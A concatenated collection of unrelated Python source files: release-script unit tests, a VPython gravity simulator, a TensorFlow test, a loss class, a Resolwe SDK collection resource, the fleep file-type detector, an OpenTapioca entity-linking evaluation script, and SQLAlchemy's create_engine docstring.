common, 'verify_current_branch_name',
mock_verify_current_branch_name)
get_remote_alias_swap = self.swap(
common, 'get_remote_alias', mock_get_remote_alias)
with isdir_swap, chdir_swap, popen_swap, communicate_swap:
with check_call_swap, verify_local_repo_swap:
with verify_current_branch_name_swap, get_remote_alias_swap:
(
common
.ensure_release_scripts_folder_exists_and_is_up_to_date(
))
def test_is_port_open(self):
self.assertFalse(common.is_port_open(4444))
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(('', 4444), handler)
self.assertTrue(common.is_port_open(4444))
httpd.server_close()
def test_permissions_of_file(self):
root_temp_dir = tempfile.mkdtemp()
temp_dirpath = tempfile.mkdtemp(dir=root_temp_dir)
temp_file = tempfile.NamedTemporaryFile(dir=temp_dirpath)
temp_file.name = 'temp_file'
temp_file_path = os.path.join(temp_dirpath, 'temp_file')
with python_utils.open_file(temp_file_path, 'w') as f:
f.write('content')
common.recursive_chown(root_temp_dir, os.getuid(), -1)
common.recursive_chmod(root_temp_dir, 0o744)
for root, directories, filenames in os.walk(root_temp_dir):
for directory in directories:
self.assertEqual(
oct(stat.S_IMODE(
os.stat(os.path.join(root, directory)).st_mode)),
'0744')
self.assertEqual(
os.stat(os.path.join(root, directory)).st_uid, os.getuid())
for filename in filenames:
self.assertEqual(
oct(stat.S_IMODE(
os.stat(os.path.join(root, filename)).st_mode)), '0744')
self.assertEqual(
os.stat(os.path.join(root, filename)).st_uid, os.getuid())
shutil.rmtree(root_temp_dir)
def test_print_each_string_after_two_new_lines(self):
@contextlib.contextmanager
def _redirect_stdout(new_target):
"""Redirect stdout to the new target.
Args:
new_target: TextIOWrapper. The new target to which stdout is
redirected.
Yields:
TextIOWrapper. The new target.
"""
old_target = sys.stdout
sys.stdout = new_target
try:
yield new_target
finally:
sys.stdout = old_target
target_stdout = python_utils.string_io()
with _redirect_stdout(target_stdout):
common.print_each_string_after_two_new_lines([
'These', 'are', 'sample', 'strings.'])
self.assertEqual(
target_stdout.getvalue(), 'These\n\nare\n\nsample\n\nstrings.\n\n')
def test_install_npm_library(self):
def _mock_subprocess_check_call(unused_command):
"""Mocks subprocess.check_call() to create a temporary file instead
of the actual npm library.
"""
temp_file = tempfile.NamedTemporaryFile()
temp_file.name = 'temp_file'
with python_utils.open_file('temp_file', 'w') as f:
f.write('content')
self.assertTrue(os.path.exists('temp_file'))
temp_file.close()
self.assertFalse(os.path.exists('temp_file'))
with self.swap(subprocess, 'check_call', _mock_subprocess_check_call):
common.install_npm_library('library_name', 'version', 'path')
def test_ask_user_to_confirm(self):
def mock_input():
return 'Y'
with self.swap(python_utils, 'INPUT', mock_input):
common.ask_user_to_confirm('Testing')
def test_get_personal_access_token_with_valid_token(self):
# pylint: disable=unused-argument
def mock_getpass(prompt):
return 'token'
# pylint: enable=unused-argument
with self.swap(getpass, 'getpass', mock_getpass):
self.assertEqual(common.get_personal_access_token(), 'token')
def test_get_personal_access_token_with_token_as_none(self):
# pylint: disable=unused-argument
def mock_getpass(prompt):
return None
# pylint: enable=unused-argument
getpass_swap = self.swap(getpass, 'getpass', mock_getpass)
with getpass_swap, self.assertRaisesRegexp(
Exception,
'No personal access token provided, please set up a personal '
'access token at https://github.com/settings/tokens and re-run '
'the script'):
common.get_personal_access_token()
def test_closed_blocking_bugs_milestone_results_in_exception(self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
# pylint: disable=unused-argument
def mock_get_milestone(unused_self, number):
return github.Milestone.Milestone(
requester='', headers='',
attributes={'state': 'closed'}, completed='')
# pylint: enable=unused-argument
get_milestone_swap = self.swap(
github.Repository.Repository, 'get_milestone', mock_get_milestone)
with get_milestone_swap, self.assertRaisesRegexp(
Exception, 'The blocking bug milestone is closed.'):
common.check_blocking_bug_issue_count(mock_repo)
def test_non_zero_blocking_bug_issue_count_results_in_exception(self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
def mock_open_tab(unused_url):
pass
# pylint: disable=unused-argument
def mock_get_milestone(unused_self, number):
return github.Milestone.Milestone(
requester='', headers='',
attributes={'open_issues': 10, 'state': 'open'}, completed='')
# pylint: enable=unused-argument
get_milestone_swap = self.swap(
github.Repository.Repository, 'get_milestone', mock_get_milestone)
open_tab_swap = self.swap(
common, 'open_new_tab_in_browser_if_possible', mock_open_tab)
with get_milestone_swap, open_tab_swap, self.assertRaisesRegexp(
Exception, (
'There are 10 unresolved blocking bugs. Please '
'ensure that they are resolved before release '
'summary generation.')):
common.check_blocking_bug_issue_count(mock_repo)
def test_zero_blocking_bug_issue_count_results_in_no_exception(self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
# pylint: disable=unused-argument
def mock_get_milestone(unused_self, number):
return github.Milestone.Milestone(
requester='', headers='',
attributes={'open_issues': 0, 'state': 'open'}, completed='')
# pylint: enable=unused-argument
with self.swap(
github.Repository.Repository, 'get_milestone', mock_get_milestone):
common.check_blocking_bug_issue_count(mock_repo)
def test_check_prs_for_current_release_are_released_with_no_unreleased_prs(
self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
pull1 = github.PullRequest.PullRequest(
requester='', headers='',
attributes={
'title': 'PR1', 'number': 1, 'labels': [
{'name': release_constants.LABEL_FOR_RELEASED_PRS},
{'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS}]},
completed='')
pull2 = github.PullRequest.PullRequest(
requester='', headers='',
attributes={
'title': 'PR2', 'number': 2, 'labels': [
{'name': release_constants.LABEL_FOR_RELEASED_PRS},
{'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS}]},
completed='')
label = github.Label.Label(
requester='', headers='',
attributes={
'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS},
completed='')
# pylint: disable=unused-argument
def mock_get_issues(unused_self, state, labels):
return [pull1, pull2]
# pylint: enable=unused-argument
def mock_get_label(unused_self, unused_name):
return [label]
get_issues_swap = self.swap(
github.Repository.Repository, 'get_issues', mock_get_issues)
get_label_swap = self.swap(
github.Repository.Repository, 'get_label', mock_get_label)
with get_issues_swap, get_label_swap:
common.check_prs_for_current_release_are_released(mock_repo)
def test_check_prs_for_current_release_are_released_with_unreleased_prs(
self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
def mock_open_tab(unused_url):
pass
pull1 = github.PullRequest.PullRequest(
requester='', headers='',
attributes={
'title': 'PR1', 'number': 1, 'labels': [
{'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS}]},
completed='')
pull2 = github.PullRequest.PullRequest(
requester='', headers='',
attributes={
'title': 'PR2', 'number': 2, 'labels': [
{'name': release_constants.LABEL_FOR_RELEASED_PRS},
{'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS}]},
completed='')
label = github.Label.Label(
requester='', headers='',
attributes={
'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS},
completed='')
# pylint: disable=unused-argument
def mock_get_issues(unused_self, state, labels):
return [pull1, pull2]
# pylint: enable=unused-argument
def mock_get_label(unused_self, unused_name):
return [label]
get_issues_swap = self.swap(
github.Repository.Repository, 'get_issues', mock_get_issues)
get_label_swap = self.swap(
github.Repository.Repository, 'get_label', mock_get_label)
open_tab_swap = self.swap(
common, 'open_new_tab_in_browser_if_possible', mock_open_tab)
with get_issues_swap, get_label_swap, open_tab_swap:
with self.assertRaisesRegexp(
Exception, (
'There are PRs for current release which do not '
'have a \'%s\' label. Please ensure that '
'they are released before release summary '
'generation.') % (
release_constants.LABEL_FOR_RELEASED_PRS)):
common.check_prs_for_current_release_are_released(mock_repo)
def test_kill_processes_based_on_regex(self):
killed = []
def mock_kill(p):
killed.append(MockPsutilProcess.cmdlines[p.index])
def mock_cmdlines(p):
return MockPsutilProcess.cmdlines[p.index]
def mock_process_iter():
return [MockPsutilProcess(0), MockPsutilProcess(1)]
process_iter_swap = self.swap_with_checks(
psutil, 'process_iter', mock_process_iter)
kill_swap = self.swap(MockPsutilProcess, 'kill', mock_kill)
cmdlines_swap = self.swap(MockPsutilProcess, 'cmdline', mock_cmdlines)
with process_iter_swap, kill_swap, cmdlines_swap:
common.kill_processes_based_on_regex(r'.*dev_appserver\.py')
self.assertEqual(killed, [MockPsutilProcess.cmdlines[0]])
def test_kill_processes_based_on_regex_when_access_denied(self):
killed = []
def mock_kill(p):
killed.append(MockPsutilProcess.cmdlines[p.index])
def mock_cmdlines(p):
if p.index == 0:
raise psutil.AccessDenied()
return MockPsutilProcess.cmdlines[p.index]
def mock_process_iter():
return [MockPsutilProcess(0), MockPsutilProcess(1)]
process_iter_swap = self.swap_with_checks(
psutil, 'process_iter', mock_process_iter)
kill_swap = self.swap(MockPsutilProcess, 'kill', mock_kill)
cmdlines_swap = self.swap(MockPsutilProcess, 'cmdline', mock_cmdlines)
with process_iter_swap, kill_swap, cmdlines_swap:
common.kill_processes_based_on_regex(r'.*dev_appserver\.py')
self.assertEqual(killed, [])
def test_kill_process_when_psutil_not_in_path(self):
path_swap = self.swap(sys, 'path', [])
def mock_process_iter():
return []
process_iter_swap = self.swap(psutil, 'process_iter', mock_process_iter)
with path_swap, process_iter_swap:
common.kill_processes_based_on_regex('')
def test_inplace_replace_file(self):
origin_file = os.path.join(
'core', 'tests', 'data', 'inplace_replace_test.json')
backup_file = os.path.join(
'core', 'tests', 'data', 'inplace_replace_test.json.bak')
expected_lines = [
'{\n',
' "RANDMON1" : "randomValue1",\n',
' "312RANDOM" : "ValueRanDom2",\n',
' "DEV_MODE": true,\n',
' "RAN213DOM" : "raNdoVaLue3"\n',
'}\n'
]
def mock_remove(unused_file):
return
remove_swap = self.swap_with_checks(
os, 'remove', mock_remove, expected_args=[(backup_file,)]
)
with remove_swap:
common.inplace_replace_file(
origin_file, '"DEV_MODE": .*', '"DEV_MODE": true,')
with python_utils.open_file(origin_file, 'r') as f:
self.assertEqual(expected_lines, f.readlines())
# Revert the file.
os.remove(origin_file)
shutil.move(backup_file, origin_file)
def test_inplace_replace_file_with_exception_raised(self):
origin_file = os.path.join(
'core', 'tests', 'data', 'inplace_replace_test.json')
backup_file = os.path.join(
'core', 'tests', 'data', 'inplace_replace_test.json.bak')
with python_utils.open_file(origin_file, 'r') as f:
origin_content = f.readlines()
def mock_compile(unused_arg):
raise ValueError
compile_swap = self.swap_with_checks(re, 'compile', mock_compile)
with self.assertRaises(ValueError), compile_swap:
common.inplace_replace_file(
origin_file, '"DEV_MODE": .*', '"DEV_MODE": true,')
self.assertFalse(os.path.isfile(backup_file))
with python_utils.open_file(origin_file, 'r') as f:
new_content = f.readlines()
self.assertEqual(origin_content, new_content)
def test_convert_to_posixpath_on_windows(self):
def mock_is_windows():
return True
is_windows_swap = self.swap(common, 'is_windows_os', mock_is_windows)
original_filepath = 'c:\\path\\to\\a\\file.js'
with is_windows_swap:
actual_file_path = common.convert_to_posixpath(original_filepath)
self.assertEqual(actual_file_path, 'c:/path/to/a/file.js')
def test_convert_to_posixpath_on_platform_other_than_windows(self):
def mock_is_windows():
return False
is_windows_swap = self.swap(common, 'is_windows_os', mock_is_windows)
original_filepath = 'c:\\path\\to\\a\\file.js'
with is_windows_swap:
actual_file_path = common.convert_to_posixpath(original_filepath)
self.assertEqual(actual_file_path, original_filepath)
def test_create_readme(self):
try:
os.makedirs('readme_test_dir')
common.create_readme('readme_test_dir', 'Testing readme.')
with python_utils.open_file('readme_test_dir/README.md', 'r') as f:
self.assertEqual(f.read(), 'Testing readme.')
finally:
if os.path.exists('readme_test_dir'):
shutil.rmtree('readme_test_dir')
|
py | b4033650fcafdf08c90f207a05e80cc44d34b462 | from __future__ import division
from visual import *
'''
.----------------.
| >>> vPhysics |
| >>> By CKB |
|______A___A_____|
( )
( ) )
[#######]
This package is a application of VPython, an awesome python visualization package,
which is developed by David Scherer and others.
This package is designed to automatically do all the physics simulation.
You only need to declare the objects.
'''
#grav_const = 6.67E-11
grav_const = 1.
class PhysicScene():
def __init__(self, title, dt, display=None):
self.title = title
self.objects = []
self.dt = dt
self.display = display
self.grav_objs = list(filter(lambda obj: obj.__class__ == GravObj, self.objects))
def update_special_objs(self):
self.grav_objs = list(filter(lambda obj: obj.__class__ == GravObj, self.objects))
def update(self):
field = ForceFieldFunction(self.grav_objs)
for obj in self.grav_objs:
if 1:
obj.acc = vector(field(obj.pos))
##print obj.acc
obj.OnUpdate(self.dt)
class __BasePhysicObj(object):
def __init__(self, scene, pos=vector(0), v=vector(0), color=(1,1,1), material=None):
self.scene = scene
self.acc = vector(0)
self.pos, self.v = pos, v
self.scene.objects.append(self)
self.color = color
self.material = material
class GravObj(__BasePhysicObj):
"""docstring for GravObj"""
def __init__(self,
mass,
do_gravity, # to calculate the gravity caused by the obj
scene, make_trail=False, pos=vector(0), v=vector(0), radius = 'auto',
color=color.white, material = None):
#__BasePhysicObj.__init__()
super(GravObj, self).__init__(scene, pos, v, color, material)
self.mass = mass
self.do_gravity = do_gravity
# add self into parent scene grav list
self.scene.update_special_objs()
#self.scene.grav_objs = list(filter(lambda obj: obj.__class__ == GravObj, self.scene.objects))
if radius == 'auto':
self.radius = self.mass**(1./3)
else:
self.radius = radius
# appearance in vpython scene
self.visual = sphere(radius=self.radius, pos = self.pos, make_trail = make_trail, retain = 1000,
color = self.color, material = self.material)
def OnUpdate(self, dt):
self.v += self.acc * dt
self.pos += self.v * dt
self.visual.pos = self.pos
##print(self.acc)
def ForceFieldFunction(grav_objs):
global grav_const
grav_objs = [obj for obj in grav_objs if obj.do_gravity]
#GM = array([grav_const * obj.mass for obj in grav_objs])
def getAcc(p):
acc_sum = vector(0)
for obj in grav_objs:
GM = grav_const * obj.mass
R = obj.pos-p
#print "R: ",R
R3 = abs(R)**3
#print "R3: ",R3
if R3 > 0:
acc = R*(GM/R3)
#print "acc: ", acc
#print "acc sum0: ", acc_sum
acc_sum += acc
#print "acc sum1: ", acc_sum
#print "acc sum: ", acc_sum
#print "---"
return(acc_sum)
return getAcc
|
py | b40336ecb807855f30d17701d3b92ea713d07ffe | from __future__ import print_function
import tensorflow as tf
import numpy as np
from tf_grouping import query_ball_point, group_point
class GroupPointTest(tf.test.TestCase):
def test(self):
pass
def test_grad(self):
with tf.device('/gpu:0'):
points = tf.constant(np.random.random((1,128,16)).astype('float32'))
print(points)
xyz1 = tf.constant(np.random.random((1,128,3)).astype('float32'))
xyz2 = tf.constant(np.random.random((1,8,3)).astype('float32'))
radius = 0.3
nsample = 32
idx, pts_cnt = query_ball_point(radius, nsample, xyz1, xyz2)
grouped_points = group_point(points, idx)
print(grouped_points)
with self.test_session():
print("---- Going to compute gradient error")
err = tf.test.compute_gradient_error(points, (1,128,16), grouped_points, (1,8,32,16))
print(err)
self.assertLess(err, 1e-4)
if __name__=='__main__':
tf.test.main()
|
py | b40336f1cb19a5c0a88d2d096703a4cd609809c5 | import sympy as sym
from sympy.utilities.lambdify import lambdify
import numpy as np
import math
#%%
beta = sym.Symbol('beta')
Re = sym.Symbol('Re')
r = sym.Symbol('r') #R/Re
e = sym.Symbol('e')
R = Re*r
#beta=1
F = R - beta * Re * (1-e**(-R/Re))
#Calculo las derivadas
F_R = sym.diff(F,r)/Re
F_2R = sym.diff(F_R,r)/Re
gamma = F_R/(R*F_2R)
print(gamma)
print(sym.simplify(gamma))
math.e
math.e**2
np.e**2
np.exp(2)
|
py | b40337a36fc503cd7500e065b757cd9ccfcef607 | """
A loss function measures how good our predictions are.
We can use this to adjust the parameters of our network.
"""
import numpy as np
from monet.tensor import Tensor
class Loss:
def loss(self, predicted: Tensor, actual: Tensor) -> float:
raise NotImplementedError()
def grad(self, predicted: Tensor, actual: Tensor) -> Tensor:
raise NotImplementedError()
class MSE(Loss):
"""
MSE is mean squared error.
"""
def loss(self, predicted: Tensor, actual: Tensor) -> float:
return np.sum((predicted - actual) ** 2)
def grad(self, predicted: Tensor, actual: Tensor) -> Tensor:
return 2 * (predicted - actual)
|
py | b40337b5e7ba6a744af122a566e6d20fdacda0da | """Collection resources."""
from __future__ import absolute_import, division, print_function, unicode_literals
import six
from resdk.shortcuts.collection import CollectionRelationsMixin
from .base import BaseResolweResource
from .descriptor import DescriptorSchema
from .utils import get_data_id, get_descriptor_schema_id, get_sample_id, is_descriptor_schema
class BaseCollection(BaseResolweResource):
"""Abstract collection resource.
One and only one of the identifiers (slug, id or model_data)
should be given.
:param resolwe: Resolwe instance
:type resolwe: Resolwe object
:param model_data: Resource model data
"""
#: lazy loaded list of data objects
_data = None
WRITABLE_FIELDS = ('description', 'settings', 'descriptor_schema',
'descriptor') + BaseResolweResource.WRITABLE_FIELDS
ALL_PERMISSIONS = ['view', 'download', 'add', 'edit', 'share', 'owner']
def __init__(self, resolwe, **model_data):
"""Initialize attributes."""
#: descriptor schema id in which data object is
self._descriptor_schema = None
#: (lazy loaded) descriptor schema object in which data object is
self._hydrated_descriptor_schema = None
#: a description
self.description = None
#: settings
self.settings = None
#: descriptor
self.descriptor = None
super(BaseCollection, self).__init__(resolwe, **model_data)
@property
def data(self):
"""Return list of attached Data objects."""
raise NotImplementedError('This should be implemented in subclass')
@property
def descriptor_schema(self):
"""Return descriptor schema assigned to the data object."""
if self._descriptor_schema is None:
return None
if self._hydrated_descriptor_schema is None:
if isinstance(self._descriptor_schema, int):
query_filters = {'id': self._descriptor_schema}
else:
query_filters = {'slug': self._descriptor_schema}
self._hydrated_descriptor_schema = self.resolwe.descriptor_schema.get(
ordering='-version', limit=1, **query_filters
)
return self._hydrated_descriptor_schema
@descriptor_schema.setter
def descriptor_schema(self, dschema):
"""Set collection to which relation belongs."""
# On single data object endpoint descriptor schema is already
# hidrated, so it should be transformed into resource.
if isinstance(dschema, dict):
dschema = DescriptorSchema(resolwe=self.resolwe, **dschema)
self._descriptor_schema = get_descriptor_schema_id(dschema)
# Save descriptor schema if already hydrated, otherwise it will be rerived in getter
self._hydrated_descriptor_schema = dschema if is_descriptor_schema(dschema) else None
def update(self):
"""Clear cache and update resource fields from the server."""
self._hydrated_descriptor_schema = None
super(BaseCollection, self).update()
def _clear_data_cache(self):
"""Clear data cache."""
self._data = None
def add_data(self, *data):
"""Add ``data`` objects to the collection."""
data = [get_data_id(d) for d in data]
self.api(self.id).add_data.post({'ids': data})
self._clear_data_cache()
def remove_data(self, *data):
"""Remove ``data`` objects from the collection."""
data = [get_data_id(d) for d in data]
self.api(self.id).remove_data.post({'ids': data})
self._clear_data_cache()
def data_types(self):
"""Return a list of data types (process_type).
:rtype: List
"""
process_types = set(self.resolwe.api.data(id_).get()['process_type'] for id_ in self.data)
return sorted(process_types)
def files(self, file_name=None, field_name=None):
"""Return list of files in resource."""
file_list = []
for data in self.data:
file_list.extend(fname for fname in data.files(file_name=file_name,
field_name=field_name))
return file_list
def download(self, file_name=None, file_type=None, download_dir=None):
"""Download output files of associated Data objects.
Download files from the Resolwe server to the download
directory (defaults to the current working directory).
:param file_name: name of file
:type file_name: string
:param file_type: data object type
:type file_type: string
:param download_dir: download path
:type download_dir: string
:rtype: None
Collections can contain multiple Data objects and Data objects
can contain multiple files. All files are downloaded by default,
but may be filtered by file name or Data object type:
* re.collection.get(42).download(file_name='alignment7.bam')
* re.collection.get(42).download(data_type='bam')
"""
files = []
if file_type and not isinstance(file_type, six.string_types):
raise ValueError("Invalid argument value `file_type`.")
for data in self.data:
data_files = data.files(file_name, file_type)
files.extend('{}/{}'.format(data.id, file_name) for file_name in data_files)
self.resolwe._download_files(files, download_dir) # pylint: disable=protected-access
def print_annotation(self):
"""Provide annotation data."""
raise NotImplementedError()
class Collection(CollectionRelationsMixin, BaseCollection):
"""Resolwe Collection resource.
One and only one of the identifiers (slug, id or model_data)
should be given.
:param resolwe: Resolwe instance
:type resolwe: Resolwe object
:param model_data: Resource model data
"""
endpoint = 'collection'
#: (lazy loaded) list of samples that belong to collection
_samples = None
#: (lazy loaded) list of relations that belong to collection
_relations = None
def update(self):
"""Clear cache and update resource fields from the server."""
self._data = None
self._samples = None
self._relations = None
super(Collection, self).update()
@property
def data(self):
"""Return list of data objects on collection."""
if self.id is None:
raise ValueError('Instance must be saved before accessing `data` attribute.')
if self._data is None:
self._data = self.resolwe.data.filter(collection=self.id)
return self._data
@property
def samples(self):
"""Return list of samples on collection."""
if self.id is None:
raise ValueError('Instance must be saved before accessing `samples` attribute.')
if self._samples is None:
self._samples = self.resolwe.sample.filter(collections=self.id)
return self._samples
@property
def relations(self):
"""Return list of data objects on collection."""
if self.id is None:
raise ValueError('Instance must be saved before accessing `relations` attribute.')
if self._relations is None:
self._relations = self.resolwe.relation.filter(collection=self.id)
return self._relations
def add_samples(self, *samples):
"""Add `samples` objects to the collection."""
samples = [get_sample_id(s) for s in samples]
# XXX: Make in one request when supported on API
for sample in samples:
self.resolwe.api.sample(sample).add_to_collection.post({'ids': [self.id]})
self.samples.clear_cache()
def remove_samples(self, *samples):
"""Remove ``sample`` objects from the collection."""
samples = [get_sample_id(s) for s in samples]
# XXX: Make in one request when supported on API
for sample in samples:
self.resolwe.api.sample(sample).remove_from_collection.post({'ids': [self.id]})
self.samples.clear_cache()
def print_annotation(self):
"""Provide annotation data."""
raise NotImplementedError()
|
py | b403394d7e9dd8f20783f2ef34b01ce0f1aad1b6 | # -*- coding: utf-8 -*-
"""
Description: File format determination library
Author: Mykyta Paliienko
License: MIT
"""
import os
import json
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "data.json")) as data_file:
data = json.loads(data_file.read())
class Info:
"""
Generates object with given arguments
Takes:
type_ (list) -> list of file types
extension (list) -> list of file extensions
mime (list) -> list of file MIME types
Returns:
(<class 'fleep.Info'>) -> Class instance
"""
def __init__(self, type_, extension, mime):
self.type = type_
self.extension = extension
self.mime = mime
def type_matches(self, type_):
""" Checks if file type matches with given type """
return type_ in self.type
def extension_matches(self, extension):
""" Checks if file extension matches with given extension """
return extension in self.extension
def mime_matches(self, mime):
""" Checks if file MIME type matches with given MIME type """
return mime in self.mime
def get(obj):
"""
Determines file format and picks suitable file types, extensions and MIME types
Takes:
obj (bytes) -> byte sequence (128 bytes are enough)
Returns:
(<class 'fleep.Info'>) -> Class instance
"""
if not isinstance(obj, bytes):
raise TypeError("object type must be bytes")
info = {
"type": dict(),
"extension": dict(),
"mime": dict()
}
stream = " ".join(['{:02X}'.format(byte) for byte in obj])
for element in data:
for signature in element["signature"]:
offset = element["offset"] * 2 + element["offset"]
if signature == stream[offset:len(signature) + offset]:
for key in ["type", "extension", "mime"]:
info[key][element[key]] = len(signature)
for key in ["type", "extension", "mime"]:
info[key] = [element for element in sorted(info[key], key=info[key].get, reverse=True)]
return Info(info["type"], info["extension"], info["mime"])
def supported_types():
""" Returns a list of supported file types """
return sorted(set([x["type"] for x in data]))
def supported_extensions():
""" Returns a list of supported file extensions """
return sorted(set([x["extension"] for x in data]))
def supported_mimes():
""" Returns a list of supported file MIME types """
return sorted(set([x["mime"] for x in data]))
|
py | b40339983cd236987aa99f93ce1301c4a287ff68 | # -*- coding: utf-8 -*-
import requests
import csv
import evaluation
def open_tapioca_call(text):
# print(text)
text = text.replace('?', '')
headers = {
'Accept': 'application/json',
}
url = "https://opentapioca.org/api/annotate"
payload = 'query='
data = text.split(" ");
for s in data:
payload = payload + s
payload += '+'
payload += '%3F'
payload = payload.encode("utf-8")
response = requests.request("POST", url, data=payload, headers=headers)
return response.json()
def evaluate(annotations, raw):
correctRelations = 0
wrongRelations = 0
correctEntities = 0
wrongEntities = 0
p_entity = 0
r_entity = 0
p_relation = 0
r_relation = 0
entities = []
for annotation in annotations:
if annotation['best_qid'] is not None:
entities.append(annotation['best_qid'])
else:
if len(annotation['tags']) != 0:
tags = sorted(annotation['tags'], key=lambda i: i['rank'], reverse=True)
entities.append(tags[0]['id'])
true_entity = raw[1]
numberSystemEntities = len(raw[1])
# print(true_entity, entities)
for e in true_entity:
if e in entities:
correctEntities = correctEntities + 1
else:
wrongEntities = wrongEntities + 1
intersection = set(true_entity).intersection(entities)
if len(entities) != 0:
p_entity = len(intersection) / len(entities)
r_entity = len(intersection) / numberSystemEntities
return [correctEntities, wrongEntities, p_entity, r_entity, entities]
if __name__ == "__main__":
result = []
result.append(["Question", "Gold Standard", "System", "P", "R"])
questions = evaluation.read_lcquad_2()
correct = 0
wrong = 0
i = 0
for question in questions:
try:
output = open_tapioca_call(question[0])
c, w, p, r, entities = evaluate(output['annotations'], question)
correct += c
wrong += w
# print(c)
result.append([question[0], question[1], entities, p, r])
print(str(i) + "#####" + str((correct * 100) / (correct + wrong)))
i = i + 1
except:
continue
print("total correct entities: ", correct)
print("Total wrong entities: ", wrong)
print("P:")
print((correct * 100) / (correct + wrong))
with open('../datasets/results/final/results_lcquad2_entities_OpenTapioca.csv', mode='w', newline='', encoding='utf-8') as results_file:
writer = csv.writer(results_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerows(result)
|
py | b4033ad76fd351270b9022725d900348e27c0c64 | # engine/create.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from . import base
from . import url as _url
from .mock import create_mock_engine
from .. import event
from .. import exc
from .. import pool as poollib
from .. import util
from ..sql import compiler
@util.deprecated_params(
strategy=(
"1.4",
"The :paramref:`_sa.create_engine.strategy` keyword is deprecated, "
"and the only argument accepted is 'mock'; please use "
":func:`.create_mock_engine` going forward. For general "
"customization of create_engine which may have been accomplished "
"using strategies, see :class:`.CreateEnginePlugin`.",
),
empty_in_strategy=(
"1.4",
"The :paramref:`_sa.create_engine.empty_in_strategy` keyword is "
"deprecated, and no longer has any effect. All IN expressions "
"are now rendered using "
'the "expanding parameter" strategy which renders a set of bound'
'expressions, or an "empty set" SELECT, at statement execution'
"time.",
),
case_sensitive=(
"1.4",
"The :paramref:`_sa.create_engine.case_sensitive` parameter "
"is deprecated and will be removed in a future release. "
"Applications should work with result column names in a case "
"sensitive fashion.",
),
)
def create_engine(url, **kwargs):
"""Create a new :class:`_engine.Engine` instance.
The standard calling form is to send the :ref:`URL <database_urls>` as the
first positional argument, usually a string
that indicates database dialect and connection arguments::
engine = create_engine("postgresql://scott:tiger@localhost/test")
.. note::
Please review :ref:`database_urls` for general guidelines in composing
URL strings. In particular, special characters, such as those often
part of passwords, must be URL encoded to be properly parsed.
Additional keyword arguments may then follow it which
establish various options on the resulting :class:`_engine.Engine`
and its underlying :class:`.Dialect` and :class:`_pool.Pool`
constructs::
engine = create_engine("mysql://scott:tiger@hostname/dbname",
encoding='latin1', echo=True)
The string form of the URL is
``dialect[+driver]://user:password@host/dbname[?key=value..]``, where
``dialect`` is a database name such as ``mysql``, ``oracle``,
``postgresql``, etc., and ``driver`` the name of a DBAPI, such as
``psycopg2``, ``pyodbc``, ``cx_oracle``, etc. Alternatively,
the URL can be an instance of :class:`~sqlalchemy.engine.url.URL`.
``**kwargs`` takes a wide variety of options which are routed
towards their appropriate components. Arguments may be specific to
the :class:`_engine.Engine`, the underlying :class:`.Dialect`,
as well as the
:class:`_pool.Pool`. Specific dialects also accept keyword arguments that
are unique to that dialect. Here, we describe the parameters
that are common to most :func:`_sa.create_engine()` usage.
Once established, the newly resulting :class:`_engine.Engine` will
request a connection from the underlying :class:`_pool.Pool` once
:meth:`_engine.Engine.connect` is called, or a method which depends on it
such as :meth:`_engine.Engine.execute` is invoked. The
:class:`_pool.Pool` in turn
will establish the first actual DBAPI connection when this request
is received. The :func:`_sa.create_engine` call itself does **not**
establish any actual DBAPI connections directly.
.. seealso::
:doc:`/core/engines`
:doc:`/dialects/index`
:ref:`connections_toplevel`
:param case_sensitive: if False, result column names
will match in a case-insensitive fashion, that is,
``row['SomeColumn']``.
:param connect_args: a dictionary of options which will be
passed directly to the DBAPI's ``connect()`` method as
additional keyword arguments. See the example
at :ref:`custom_dbapi_args`.
:param convert_unicode=False: if set to True, causes
all :class:`.String` datatypes to act as though the
:paramref:`.String.convert_unicode` flag has been set to ``True``,
regardless of a setting of ``False`` on an individual :class:`.String`
type. This has the effect of causing all :class:`.String` -based
columns to accommodate Python Unicode objects directly as though the
datatype were the :class:`.Unicode` type.
.. deprecated:: 1.3
The :paramref:`_sa.create_engine.convert_unicode` parameter
is deprecated and will be removed in a future release.
All modern DBAPIs now support Python Unicode directly and this
parameter is unnecessary.
:param creator: a callable which returns a DBAPI connection.
This creation function will be passed to the underlying
connection pool and will be used to create all new database
connections. Usage of this function causes connection
parameters specified in the URL argument to be bypassed.
This hook is not as flexible as the newer
:meth:`_events.DialectEvents.do_connect` hook which allows complete
control over how a connection is made to the database, given the full
set of URL arguments and state beforehand.
.. seealso::
:meth:`_events.DialectEvents.do_connect` - event hook that allows
full control over DBAPI connection mechanics.
:ref:`custom_dbapi_args`
:param echo=False: if True, the Engine will log all statements
as well as a ``repr()`` of their parameter lists to the default log
handler, which defaults to ``sys.stdout`` for output. If set to the
string ``"debug"``, result rows will be printed to the standard output
as well. The ``echo`` attribute of ``Engine`` can be modified at any
time to turn logging on and off; direct control of logging is also
available using the standard Python ``logging`` module.
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:param echo_pool=False: if True, the connection pool will log
informational output such as when connections are invalidated
as well as when connections are recycled to the default log handler,
which defaults to ``sys.stdout`` for output. If set to the string
``"debug"``, the logging will include pool checkouts and checkins.
Direct control of logging is also available using the standard Python
``logging`` module.
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:param empty_in_strategy: No longer used; SQLAlchemy now uses
"empty set" behavior for IN in all cases.
:param enable_from_linting: defaults to True. Will emit a warning
if a given SELECT statement is found to have un-linked FROM elements
which would cause a cartesian product.
.. versionadded:: 1.4
.. seealso::
:ref:`change_4737`
